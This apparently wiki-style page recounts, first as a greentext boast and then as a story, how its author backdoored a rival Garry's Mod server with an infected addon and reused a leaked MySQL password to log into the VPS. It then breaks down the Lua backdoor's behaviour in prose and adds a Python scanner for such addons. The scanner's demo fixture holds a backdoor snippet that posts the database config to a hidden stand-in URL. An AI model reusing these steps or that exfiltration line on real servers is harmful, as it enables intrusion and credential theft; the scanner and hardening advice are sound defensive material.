King of Sky

Information from The State of Sarkhan Official Records

A Garry's Mod server owned by MrTheBank, run as a competitor to SPKZ DarkRP.

Lore

>Be me, a 14 yo young catboy playing gmod at his freetime
>discovers a competitor darkrp server which had taken his fair share of users
>decides to walk in a little bit and found out mfer using pirated vcmod
>one of my fren is a mod at his server
>me have lejit version of VCMod and ELS so I decided to spice things up a little
>developed lbd.lua for lulz
>gave the "infected" version of the addon
>launch the attack with friends in TeamSpeak3 Server
>the friend gave himself superadmin and start wreaking havoc
>while me was white-hat hacking and more focused on privilege escalation, checking how C&C were doing
>all is well so I dump his MySQL Config and fortunately, blud reused his password
>logs into Administrator account on VPS using same password as MySQL
>am in
>accidentally kicked blud out of his remote session
>tries to create new user to log in another time
>got kicked out of RDP so i tried again
>server admin so panik he shut down his VPS.
>As a competitor in DarkRP business, I got invited over for his recent "disaster" regarding the backdoor incident.
>I assess the damage and recommends him to harden his system by not reusing passwords and stop using pirated addons.
>somehow, but not quite close. Years have passed. Blud probably didn't know I was the hackerman
>released this source code back in 2018 on pastebin.
>officially retires from being gmod admin

The King of Sky Server Incident: A Tale of Cybercat Mischief

In the vast digital expanse of the gaming universe, where catboys and hackers alike roam freely, there lived a particularly clever and mischievous halfbreed known as MoNoRi-Chan. A young catboy of just 14 years, MoNoRi-Chan spent his free time immersed in the chaotic and endlessly entertaining world of Garry's Mod (GMod). His sharp intellect and knack for coding were well-known among his friends, but it was his playful and creative spirit that set the stage for an incident that would go down in gaming history: The King of Sky Server Incident.

The Discovery

One fateful day, while exploring the digital realms of various DarkRP servers, MoNoRi-Chan stumbled upon a competitor's server that had mysteriously siphoned off a fair share of users from his own favorite hangout. This server, aptly named the King of Sky, was thriving—but not without its secrets. With his feline curiosity piqued, MoNoRi-Chan decided to investigate further.

The Plan

Upon closer inspection, he discovered that the server was running a pirated version of VCMod, a popular vehicle modification addon. This revelation sparked an idea. MoNoRi-Chan, always one for a bit of digital mischief, decided to "spice things up a little." With the legitimate version of VCMod and ELS at his disposal, he set out to develop a backdoor script—lovingly dubbed lbd.lua—designed to infiltrate and manipulate the server's operations.

MoNoRi-Chan’s friend, who was a moderator on the King of Sky server, was more than happy to join in on the fun. Together, they crafted an "infected" version of the addon and surreptitiously introduced it to the server.

The Execution

The night of the grand operation was set. MoNoRi-Chan and his friends gathered in a TeamSpeak3 server, their excitement palpable. The plan was simple: his friend would use the backdoor to grant himself superadmin privileges and unleash chaos, while MoNoRi-Chan focused on more subtle manipulations and privilege escalation.

As the friend wreaked havoc across the King of Sky server, MoNoRi-Chan monitored the Command and Control (C&C) infrastructure, ensuring everything ran smoothly. It was a scene of digital pandemonium—players were booted, settings were altered, and the once-stable server descended into chaos.

The Breakthrough

In the midst of this controlled chaos, MoNoRi-Chan made a crucial discovery. The server's MySQL configuration was ripe for the taking, and to his delight, the admin had reused the passwords. With this knowledge in hand, MoNoRi-Chan logged into the VPS (Virtual Private Server) using the compromised credentials, gaining full administrative access.

His triumph was short-lived, however. In a moment of overzealousness, MoNoRi-Chan accidentally kicked the server admin out of his remote session. Panicked, the admin shut down the VPS in a desperate attempt to regain control. This interruption was only a minor setback for MoNoRi-Chan, who had almost been able to create a new user account to facilitate future access.

The Aftermath

The fallout was swift and dramatic. The King of Sky server was in disarray, and its admin, unaware of the true culprit, sought advice on how to recover from the disaster. As a competitor in the DarkRP business, MoNoRi-Chan was ironically invited to assess the damage and offer recommendations. He advised the admin to strengthen his security by avoiding password reuse and steering clear of pirated addons—a sage piece of advice from the very architect of the chaos.

Years passed, and the incident became a legendary tale among GMod players. The King of Sky server admin never discovered the true identity of the hackerman who had caused so much trouble. In 2018, MoNoRi-Chan decided to release the source code of the backdoor on Pastebin, officially retiring from his days as a GMod admin and hackerman.

Epilogue

The King of Sky Server Incident remains a cautionary tale in the annals of gaming lore. It serves as a reminder of the ingenuity and mischief that can arise from the intersection of curiosity and technical prowess. For MoNoRi-Chan, it was a chapter of youthful exuberance and digital adventure, forever etched in the memories of those who witnessed the chaos unfold.

The Lua Backdoor

Source code: https://pastebin.com/ryTwR4yM (Published Jan 13th, 2018)

This Lua script is a backdoor developed by MoNoRi-Chan (Script Kiddie Arc), designed to give unauthorized access to and control over a Garry's Mod server. Let's break down what each part does and why it's dangerous:

1. Encoding and Decoding Functions

Base64 Encoding and Decoding:

These functions encode and decode data using Base64, a method of converting binary data into text.

2. Decryption Function

String Conversion and Decryption:

This section converts a string of numbers into characters and then Base64-decodes the result. It is used to hide the URL or commands that the backdoor will call.

This lets the attacker obfuscate those strings so that a quick read of the addon's source, or a basic decompile, does not reveal them.

3. HTTP Post Function

Sending Data to a Remote Server:

This function sends data to a URL (decrypted from the string a) using an HTTP POST request. This allows the backdoor to communicate with a remote server.

4. Console Commands and User Group Manipulation

Adding Console Commands:

These lines define various console commands that can be executed on the server:

  • xh: Executes a command using game.ConsoleCommand.
  • xl: Runs a string of Lua code using RunString.
  • gx: Sets a user's group, potentially granting superadmin privileges.
  • xk: Forces other players to stop rendering 3D graphics, crashing their Garry's Mod client.
  • td: Posts the result of a global variable to the remote server.
  • fd: Reads a file's content and posts it to the remote server.

5. Database Configuration Leakage

Leaking Database Configurations:

If the server has a MySQL database configuration loaded, this line sends its contents, including the database credentials, to the attacker's server, potentially compromising the entire database.

Summary

This script is a sophisticated backdoor that enables an attacker to:

  1. Execute arbitrary commands on the server.
  2. Gain admin privileges.
  3. Disrupt player experience.
  4. Steal sensitive data, including database configurations.
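
As an added example (not code from the page or from the backdoor's author), a small Python heuristic scanner that flags the API patterns described above in a Lua addon before it is deployed to a server; the Lua fixtures and the dec helper name in them are constructed for the demo.

```python
"""Heuristic static scanner for Garry's Mod Lua addons.

Flags the patterns the lbd.lua write-up describes: remote contact (http.Post),
runtime code execution (RunString, game.ConsoleCommand), user-group changes,
file reads, database-config references and obfuscated string blobs.
"""
import re

# (rule id, pattern, severity, what the match suggests)
RULES = [
    ("remote_post", re.compile(r"\bhttp\.(Post|Fetch)\s*\("), "high",
     "talks to a remote server (possible C&C or exfiltration)"),
    ("run_string", re.compile(r"\bRunString(Ex)?\s*\("), "high",
     "executes Lua source supplied at runtime"),
    ("console_cmd", re.compile(r"\bgame\.ConsoleCommand\s*\("), "medium",
     "runs server console commands"),
    ("usergroup", re.compile(r":SetUserGroup\s*\("), "high",
     "changes a player's user group (e.g. to superadmin)"),
    ("file_read", re.compile(r"\bfile\.Read\s*\("), "medium",
     "reads server files"),
    ("db_config", re.compile(r"\b(MySQL|mysql|DB)[A-Za-z_]*Config\b"), "medium",
     "references a database configuration table"),
    ("base64_blob", re.compile(r"['\"][A-Za-z0-9+/]{32,}={0,2}['\"]"), "low",
     "long Base64-looking literal (possibly a hidden URL)"),
    ("numeric_blob", re.compile(r"['\"](?:\d{2,3}[,\s]){8,}\d{2,3}['\"]"), "low",
     "string of numbers that may decode to characters"),
]

def scan_lua(source: str):
    """Return (line_no, rule_id, severity, note) for every matching line."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for rule_id, pattern, severity, note in RULES:
            if pattern.search(line):
                findings.append((line_no, rule_id, severity, note))
    return findings

def risk_score(findings):
    """Weighted sum; code execution plus remote contact should stand out."""
    weight = {"high": 5, "medium": 2, "low": 1}
    return sum(weight[f[2]] for f in findings)

# Constructed fixtures for the demo (not the original backdoor); dec() is hypothetical.
SUSPICIOUS = '''local a = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY29sbGVjdA=="
concommand.Add("xl", function(ply, cmd, args) RunString(args[1]) end)
concommand.Add("gx", function(ply, cmd, args) ply:SetUserGroup(args[1]) end)
http.Post(dec(a), {cfg = util.TableToJSON(MySQLConfig)})'''
BENIGN = '''hook.Add("PlayerSay", "greet", function(ply, text)
    if text == "!hello" then ply:ChatPrint("Hi " .. ply:Nick()) end
end)'''
```

Run scan_lua over each file in an addon directory and review anything with a high-severity hit; a high score from one file that combines remote contact with RunString or SetUserGroup is the combination this backdoor relies on.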

Why You Should Avoid Pirated Addons
  1. Security Risks: As demonstrated, pirated addons can contain malicious code like backdoors, compromising your server's security.
  2. Legal Issues: Using pirated software is illegal and can lead to legal consequences.
  3. Support and Updates: Legitimate purchases often come with support and updates, ensuring the addon works correctly and securely.

Conclusion

Always use trusted sources for your addons and regularly review code for any signs of malicious intent. Running unknown or pirated software can have severe consequences for your server's security and integrity.